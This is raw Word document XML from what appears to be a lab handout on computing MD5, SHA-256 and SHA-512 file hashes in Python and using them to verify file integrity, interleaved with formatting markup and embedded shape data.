        <w:ind w:left="1320" w:right="5720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># MD5 hash calculation md5_hash = hashlib.md5() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>md5_hash.update(file_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3AC76F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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hashes["MD5"]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md5_hash.hexdigest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1901E1B1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3BFA38" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83"/>
        <w:ind w:left="1320" w:right="522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# SHA-256 hash calculation sha256_hash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hashlib.sha256() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sha256_hash.update(file_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFB3C04" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2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hashes["SHA-256"]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sha256_hash.hexdigest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543A4117" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225"/>
        <w:ind w:left="1320" w:right="5229"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t># SHA-512 hash calculation sha512_hash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hashlib.sha512() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sha512_hash.update(file_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DFEED0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2" w:line="477" w:lineRule="auto"/>
        <w:ind w:left="840" w:right="3449" w:firstLine="479"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>hashes["SHA-512"]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sha512_hash.hexdigest() return hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED98B22" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="3"/>
        <w:ind w:left="360" w:right="6114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compare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values def compare_hashes(hashes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABB94EE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print(f"MD5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Hash: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{hashes['MD5']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094D58CA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print(f"SHA-256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Hash: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{hashes['SHA-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>256']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7753E744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print(f"SHA-512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Hash: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{hashes['SHA-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>512']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DC0A25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5C7E23C0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="486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functions if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="80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80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":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E75AF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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file_path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path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hash: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") hashes = compute_hash(file_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07659ADC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compare_hashes(hashes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF2AD22" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="195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7BE8C891" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="62"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C634D00" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:line="280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hash_functions.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788DC93F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:line="272" w:lineRule="exact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 terminal and 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 the directory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Python script is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>located.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726E6454" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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100BE0D5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32BCF7AA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1080" w:right="8395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 xml:space="preserve">bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1675F5A6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hash_functions.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465DA052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10DC3A6A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 check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prompted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB9B911" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="13"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EFDA2BB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Verifying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File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Integrity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Using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Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7358CCF4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="57"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30BB917F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="552"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Once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program runs,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MD5,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SHA-256,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SHA-512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values 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provided </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C97B7F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>You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compare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trusted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source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verify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intact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A93801F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:right="447"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>To check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altered,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calculate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later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compare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it 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 original hash. If the hashes match, the file is intact; if they differ, the file has been modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A6D598" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="13"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="465CE1C3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Comparing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Hash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14:paraId="744DE2DC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="61"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B04F6C6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1078"/>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="1077"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>MD5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considered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weak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cryptographic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purposes.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vulnerable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collisions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(two different inputs producing the same hash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387BF6A7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1078"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1078" w:hanging="358"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>SHA-256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Stronger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MD5,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producing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longer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secure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hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B22DBA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1078"/>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="889"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>SHA-512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longer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SHA-256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resistant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collision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attacks, making it the most secure of the three.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C90EFDD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri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EF36F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="71"/>
        <w:ind w:left="360" w:right="383"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>By</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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hashes, 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MD5, SHA-256, and SHA-512.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DDD6CB" w14:textId="77777777" w:rsidR="00A16F47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6E950B" wp14:editId="7358C027">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>302289</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470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144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DC5D8" id="Group 10" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.8pt;width:486.1pt;height:1.6pt;z-index:-15727104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&#10;AAAAAAQABADzAAAAuAcAAAAA&#10;">
                <v:shape id="Graphic 11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NQwAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Li8Iw&#10;EL4L/ocwgrc11YO7VqOID3aPvsDr2IxttZnUJqvVX28Ewdt8fM8ZTWpTiCtVLresoNuJQBAnVuec&#10;Kthtl18/IJxH1lhYJgV3cjAZNxsjjLW98ZquG5+KEMIuRgWZ92UspUsyMug6tiQO3NFWBn2AVSp1&#10;hbcQbgrZi6K+NJhzaMiwpFlGyXnzbxQcdnp+WQ163zq9H/eL39ODDvRQqt2qp0MQnmr/Eb/dfzrM&#10;78Lrl3CAHD8BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAQJnDUMAAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" path="m6172200,l,,,19685r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 12" o:spid="_x0000_s1028" style="position:absolute;left:61704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  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 13" o:spid="_x0000_s1029" style="position:absolute;left:3;top:3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rJwgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0L/ocwQm+atUJtV6NoodAeqnRbFnobNuNmcTNZklTXf28Kgrd5vM9ZrnvbihP50DhWMJ1kIIgr&#10;pxuuFfx8v42fQYSIrLF1TAouFGC9Gg6WmGt35i86FbEWKYRDjgpMjF0uZagMWQwT1xEn7uC8xZig&#10;r6X2eE7htpWPWfYkLTacGgx29GqoOhZ/VkHpvdnsd59b+ph1v808K1+2oVTqYdRvFiAi9fEuvrnf&#10;dZo/g/9f0gFydQUAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAPktrJwgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m3048,3035l,3035,,16751r3048,l3048,3035xem6173152,r-3035,l6170117,3035r3035,l6173152,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 14" o:spid="_x0000_s1030" style="position:absolute;left:61704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  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 1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8r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 16" o:spid="_x0000_s1032" style="position:absolute;left:3;top:171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T1xAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;EMXvwn6HMAteRFNFutI1yqIIghf/LXocmtm2bDMJTdT67Y0geJvhvfebN9N5a2pxpcZXlhUMBwkI&#10;4tzqigsFx8OqPwHhA7LG2jIpuJOH+eyjM8VM2xvv6LoPhYgQ9hkqKENwmZQ+L8mgH1hHHLU/2xgM&#10;cW0KqRu8Rbip5ShJUmmw4nihREeLkvL//cVESuoWlRn9ustxO96e7qtNb3n+Uqr72f58gwjUhrf5&#10;lV7rWD+F5y9xADl7AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAE9vhPXEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=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86120C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="096F2A35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08B2F08D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="62"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C2F4AA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:right="659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successfully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computes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MD5,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SHA-256,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SHA-512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values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 the given file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7930F45F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>File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integrity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verified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comparing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known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original</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661BDFD0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34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observe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difference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lengths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security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level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function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56661FC7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="20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ED08D6F" wp14:editId="11CE9925">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>297904</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="2032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15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24F82" id="Group 17" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.45pt;width:486.1pt;height:1.6pt;z-index:-15726592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VCOgQAAIAYAAAOAAAAZHJzL2Uyb0RvYy54bWzsWV2PmzgUfV9p/wPifQcMSZigyVRV2xlV&#10;qtpKndU+O2ACKmBqOyHz7/faxoSPJCWzGo20iiLFJr7Y9x7f43Mhd+/2RW7tCOMZLVc2unFti5QR&#10;jbNys7L/fnr469a2uMBljHNakpX9TLj97v7PP+7qKiQeTWkeE2bBJCUP62plp0JUoePwKCUF5je0&#10;IiUMJpQVWMAl2zgxwzXMXuSO57oLp6YsrhiNCOfw60c9aN+r+ZOEROJbknAirHxlg29CfTP1vZbf&#10;zv0dDjcMV2kWNW7gF3hR4KyERdupPmKBrS3LRlMVWcQop4m4iWjh0CTJIqJigGiQO4jmkdFtpWLZ&#10;hPWmamECaAc4vXja6OvukVU/qu9Mew/dLzT6yQEXp642YXdcXm8OxvuEFfImCMLaK0SfW0TJXlgR&#10;/LhAgT8LAPgIxjzX9xrEoxS2ZXRXlH46e5+DQ72ocq11pa4gd/gBHv7f4PmR4ooo1LkM/zuzshhS&#10;GxK5xAWk8GOTLfALoCQXByuJYHPFGzCP4oM8nXIdgDzIYw0QWi5u53K8DRSH0ZaLR0IV0nj3hQsY&#10;hjSLTQ+nphftS9NlkPcy43OV8cK2IOOZbUHGr/XyFRbyPjmV7Fq12irtSQrBKkfkaEF35IkqOyH3&#10;CzZUW5m9BlcPNnnZtYWoOlZmzLSVmk/bwHqBAgZmM+Om1XbddS+zVhnXmTfKKScaYxm6AruFA+y6&#10;gHOaZ/FDlucSAM426w85s3YYkF0+yE+zVx0zyEwe6gyQvTWNnyGBakiZlc1/bTEjtpV/LiFFIXJh&#10;Osx01qbDRP6BqjNLYc+4eNr/g1llVdBd2QLy5ys1mYpDkxngvzTQtvLOkr7fCppkMm2Ub9qj5gJY&#10;ozP49emzHNFnKdGbTB9IAHfmIZVS/i3SaWxY5KNgrimkenp3Df+6G2pwehUGaS+APqoj0T8wQ2ex&#10;786CHikOBv10n04dNaUO2Exh2sGa0y1fhzKfPPm5Umas84bHDRkaxQGtHCiOVs/JlIEN13RZ+n26&#10;9FQZBWj2lqKj6wMpOsqRE7QB9QUt8V3fuHqeOR1DwwbT9nRnEczVUdLRh74dYKiXRtNNjyw+Ep2e&#10;7k6AQG4ZmnuTDg95VCLUP2hMVKZtVbW1POL1yLh14SLj1zlOrgosH32OPTacOE5AO/sFLKjpixV4&#10;5in5xuFYgpG/hIr/rTVYe3HiNOlz4/xRYkIxZDBt7xzxA7RoQjbjp